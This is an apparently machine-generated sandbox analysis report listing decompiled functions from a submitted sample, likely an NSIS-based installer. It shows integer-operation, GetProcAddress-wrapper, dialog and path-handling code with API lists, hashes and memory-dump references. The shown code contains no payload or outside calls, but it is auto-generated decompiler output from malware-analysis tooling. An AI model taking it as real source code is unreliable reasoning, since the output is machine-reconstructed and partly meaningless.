                                                          • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                                          • Opcode Fuzzy Hash: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
                                                          • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 97%
                                                          			E100018A9(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void* _t43;
				signed int _t44;
				signed int _t59;
				void _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				void* _t100;

				_t84 = __edx;
				 *0x1000406c = _a8;
				_t59 = 0;
				 *0x10004070 = _a16;
				_v12 = 0;
				_v8 = E10001243();
				_t89 = E10001311(_t41);
				_t86 = _t84;
				_t43 = E10001243();
				_t63 =  *_t43;
				_a8 = _t43;
				if(_t63 != 0x7e && _t63 != 0x21) {
					_a16 = E10001243();
					_t59 = E10001311(_t56);
					_v12 = _t84;
					GlobalFree(_a16);
					_t43 = _a8;
				}
				_t64 =  *_t43 & 0x0000ffff;
				_t100 = _t64 - 0x2f;
				if(_t100 > 0) {
					_t65 = _t64 - 0x3c;
					__eflags = _t65;
					if(_t65 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3c;
						if( *((short*)(_t43 + 2)) != 0x3c) {
							__eflags = _t86 - _v12;
							if(__eflags > 0) {
								L54:
								_t44 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t89 = _t44;
								L57:
								_t86 = _t84;
								L58:
								E10001470(_t84, _t89, _t86,  &_v76);
								E10001272( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t44 = 1;
								goto L55;
							}
							__eflags = _t89 - _t59;
							if(_t89 < _t59) {
								goto L47;
							}
							goto L54;
						}
						_t84 = _t86;
						_t44 = E10002D90(_t89, _t59, _t84);
						goto L56;
					}
					_t67 = _t65 - 1;
					__eflags = _t67;
					if(_t67 == 0) {
						__eflags = _t89 - _t59;
						if(_t89 != _t59) {
							goto L54;
						}
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L54;
						}
						goto L47;
					}
					_t68 = _t67 - 1;
					__eflags = _t68;
					if(_t68 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3e;
						if( *((short*)(_t43 + 2)) != 0x3e) {
							__eflags = _t86 - _v12;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t89 - _t59;
							if(_t89 <= _t59) {
								goto L54;
							}
							goto L47;
						}
						_t84 = _t86;
						_t44 = E10002DB0(_t89, _t59, _t84);
						goto L56;
					}
					_t70 = _t68 - 0x20;
					__eflags = _t70;
					if(_t70 == 0) {
						_t89 = _t89 ^ _t59;
						_t86 = _t86 ^ _v12;
						goto L58;
					}
					_t71 = _t70 - 0x1e;
					__eflags = _t71;
					if(_t71 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x7c;
						if( *((short*)(_t43 + 2)) != 0x7c) {
							_t89 = _t89 | _t59;
							_t86 = _t86 | _v12;
							goto L58;
						}
						__eflags = _t89 | _t86;
						if((_t89 | _t86) != 0) {
							goto L47;
						}
						__eflags = _t59 | _v12;
						if((_t59 | _v12) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t71 == 0;
					if(_t71 == 0) {
						_t89 =  !_t89;
						_t86 =  !_t86;
					}
					goto L58;
				}
				if(_t100 == 0) {
					L21:
					__eflags = _t59 | _v12;
					if((_t59 | _v12) != 0) {
						_v24 = E10002C20(_t89, _t86, _t59, _v12);
						_v20 = _t84;
						_t89 = E10002CD0(_t89, _t86, _t59, _v12);
						_t43 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t84 = _t86;
					}
					__eflags =  *_t43 - 0x2f;
					if( *_t43 != 0x2f) {
						goto L57;
					} else {
						_t89 = _v24;
						_t86 = _v20;
						goto L58;
					}
				}
				_t76 = _t64 - 0x21;
				if(_t76 == 0) {
					_t44 = 0;
					__eflags = _t89 | _t86;
					if((_t89 | _t86) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t77 = _t76 - 4;
				if(_t77 == 0) {
					goto L21;
				}
				_t78 = _t77 - 1;
				if(_t78 == 0) {
					__eflags =  *((short*)(_t43 + 2)) - 0x26;
					if( *((short*)(_t43 + 2)) != 0x26) {
						_t89 = _t89 & _t59;
						_t86 = _t86 & _v12;
						goto L58;
					}
					__eflags = _t89 | _t86;
					if((_t89 | _t86) == 0) {
						goto L54;
					}
					__eflags = _t59 | _v12;
					if((_t59 | _v12) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t79 = _t78 - 4;
				if(_t79 == 0) {
					_t44 = E10002BE0(_t89, _t86, _t59, _v12);
					goto L56;
				} else {
					_t80 = _t79 - 1;
					if(_t80 == 0) {
						_t89 = _t89 + _t59;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t80 == 0) {
							_t89 = _t89 - _t59;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L58;
				}
			}



























                                                          0x100018a9
                                                          0x100018b3
                                                          0x100018bc
                                                          0x100018bf
                                                          0x100018c4
                                                          0x100018cd
                                                          0x100018d6
                                                          0x100018d8
                                                          0x100018da
                                                          0x100018df
                                                          0x100018e2
                                                          0x100018e9
                                                          0x100018f7
                                                          0x10001900
                                                          0x10001905
                                                          0x10001908
                                                          0x1000190e
                                                          0x1000190e
                                                          0x10001911
                                                          0x10001914
                                                          0x10001917
                                                          0x100019df
                                                          0x100019df
                                                          0x100019e2
                                                          0x10001a4d
                                                          0x10001a52
                                                          0x10001a61
                                                          0x10001a64
                                                          0x10001a6c
                                                          0x10001a6c
                                                          0x10001a6c
                                                          0x10001a6e
                                                          0x10001a6e
                                                          0x10001a6f
                                                          0x10001a6f
                                                          0x10001a71
                                                          0x10001a71
                                                          0x10001a73
                                                          0x10001a79
                                                          0x10001a82
                                                          0x10001a93
                                                          0x10001a9e
                                                          0x10001a9e
                                                          0x10001a66
                                                          0x10001a48
                                                          0x10001a48
                                                          0x10001a4a
                                                          0x10001a4a
                                                          0x00000000
                                                          0x10001a4a
                                                          0x10001a68
                                                          0x10001a6a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a6a
                                                          0x10001a56
                                                          0x10001a5a
                                                          0x00000000
                                                          0x10001a5a
                                                          0x100019e4
                                                          0x100019e4
                                                          0x100019e5
                                                          0x10001a3f
                                                          0x10001a41
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a43
                                                          0x10001a46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a46
                                                          0x100019e7
                                                          0x100019e7
                                                          0x100019e8
                                                          0x10001a1e
                                                          0x10001a23
                                                          0x10001a32
                                                          0x10001a35
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a37
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a39
                                                          0x10001a3b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a3d
                                                          0x10001a27
                                                          0x10001a2b
                                                          0x00000000
                                                          0x10001a2b
                                                          0x100019ea
                                                          0x100019ea
                                                          0x100019ed
                                                          0x10001a17
                                                          0x10001a19
                                                          0x00000000
                                                          0x10001a19
                                                          0x100019ef
                                                          0x100019ef
                                                          0x100019f2
                                                          0x100019fe
                                                          0x10001a03
                                                          0x10001a10
                                                          0x10001a12
                                                          0x00000000
                                                          0x10001a12
                                                          0x10001a05
                                                          0x10001a07
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a09
                                                          0x10001a0c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001a0e
                                                          0x100019f5
                                                          0x100019f6
                                                          0x100019f8
                                                          0x100019fa
                                                          0x100019fa
                                                          0x00000000
                                                          0x100019f6
                                                          0x1000191d
                                                          0x10001996
                                                          0x10001998
                                                          0x1000199b
                                                          0x100019b7
                                                          0x100019ba
                                                          0x100019c5
                                                          0x100019c7
                                                          0x1000199d
                                                          0x1000199d
                                                          0x100019a1
                                                          0x100019a5
                                                          0x100019a5
                                                          0x100019ca
                                                          0x100019ce
                                                          0x00000000
                                                          0x100019d4
                                                          0x100019d4
                                                          0x100019d7
                                                          0x00000000
                                                          0x100019d7
                                                          0x100019ce
                                                          0x1000191f
                                                          0x10001922
                                                          0x10001987
                                                          0x10001989
                                                          0x1000198b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001991
                                                          0x10001924
                                                          0x10001927
                                                          0x00000000
                                                          0x00000000
                                                          0x10001929
                                                          0x1000192a
                                                          0x10001960
                                                          0x10001965
                                                          0x1000197d
                                                          0x1000197f
                                                          0x00000000
                                                          0x1000197f
                                                          0x10001967
                                                          0x10001969
                                                          0x00000000
                                                          0x00000000
                                                          0x1000196f
                                                          0x10001972
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001978
                                                          0x1000192c
                                                          0x1000192f
                                                          0x10001956
                                                          0x00000000
                                                          0x10001931
                                                          0x10001931
                                                          0x10001932
                                                          0x10001946
                                                          0x10001948
                                                          0x10001934
                                                          0x10001936
                                                          0x1000193c
                                                          0x1000193e
                                                          0x1000193e
                                                          0x10001936
                                                          0x00000000
                                                          0x10001932

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                          • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                          0x10001619
                                                          0x10001625
                                                          0x10001632
                                                          0x10001639
                                                          0x10001642
                                                          0x1000164e

                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32 ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                          0x00401d63
                                                          0x00401d6a
                                                          0x00401d99
                                                          0x00401da1
                                                          0x00401da8
                                                          0x00401da8
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00401D5D
                                                          • GetClientRect.USER32 ref: 00401D6A
                                                          • LoadImageW.USER32 ref: 00401D8B
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
                                                          • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                          • Opcode Fuzzy Hash: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
                                                          • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406193();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                          0x00401c19
                                                          0x00401c1b
                                                          0x00401c22
                                                          0x00401c25
                                                          0x00401c28
                                                          0x00401c32
                                                          0x00401c36
                                                          0x00401c39
                                                          0x00401c42
                                                          0x00401c42
                                                          0x00401c45
                                                          0x00401c49
                                                          0x00401c52
                                                          0x00401c52
                                                          0x00401c55
                                                          0x00401c59
                                                          0x00401c5b
                                                          0x00401cb0
                                                          0x00401cb2
                                                          0x00401cbd
                                                          0x00401cc7
                                                          0x00401cca
                                                          0x00401cca
                                                          0x00401cd3
                                                          0x00000000
                                                          0x00401c5d
                                                          0x00401c64
                                                          0x00401c66
                                                          0x00401c69
                                                          0x00401c6f
                                                          0x00401c76
                                                          0x00401c79
                                                          0x00401ca1
                                                          0x00401cd9
                                                          0x00401cd9
                                                          0x00401c7b
                                                          0x00401c89
                                                          0x00401c91
                                                          0x00401c94
                                                          0x00401c94
                                                          0x00401c79
                                                          0x00401cdc
                                                          0x00401cdf
                                                          0x00401ce5
                                                          0x00402a65
                                                          0x00402a65
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • SendMessageTimeoutW.USER32 ref: 00401C89
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                          • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                          • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                          • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405BC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405BC8(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B4A(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}









                                                          0x00405bd1
                                                          0x00405bd8
                                                          0x00405bdb
                                                          0x00405bdd
                                                          0x00405be3
                                                          0x00405bfb
                                                          0x00405c1d
                                                          0x00000000
                                                          0x00405c03
                                                          0x00405c05
                                                          0x00405c06
                                                          0x00405c09
                                                          0x00405c0a
                                                          0x00405c13
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c16
                                                          0x00405c19
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c19
                                                          0x00000000
                                                          0x00405c06
                                                          0x00405bf2
                                                          0x00000000
                                                          0x00405bf3

                                                          APIs
                                                          • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,?,74D0FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00000000), ref: 00405BD6
                                                          • CharNextW.USER32(00000000), ref: 00405BDB
                                                          • CharNextW.USER32(00000000), ref: 00405BF3
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp, xrefs: 00405BC9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CharNext
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp
                                                          • API String ID: 3213498283-1924618205
                                                          • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                          • Instruction ID: 71fcaf91f17ad0c61ae46c06a49b7004919c5bb89cc9bf949e59d58efb239cdc
                                                          • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                          • Instruction Fuzzy Hash: EAF09061914B2195EA3176544C45E7766BCEB96760B00807BE702B72C0EBB8A8C19FEE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E00405B1D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                          0x00405b1e
                                                          0x00405b2b
                                                          0x00405b2c
                                                          0x00405b37
                                                          0x00405b3f
                                                          0x00405b3f
                                                          0x00405b47

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405B3F
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
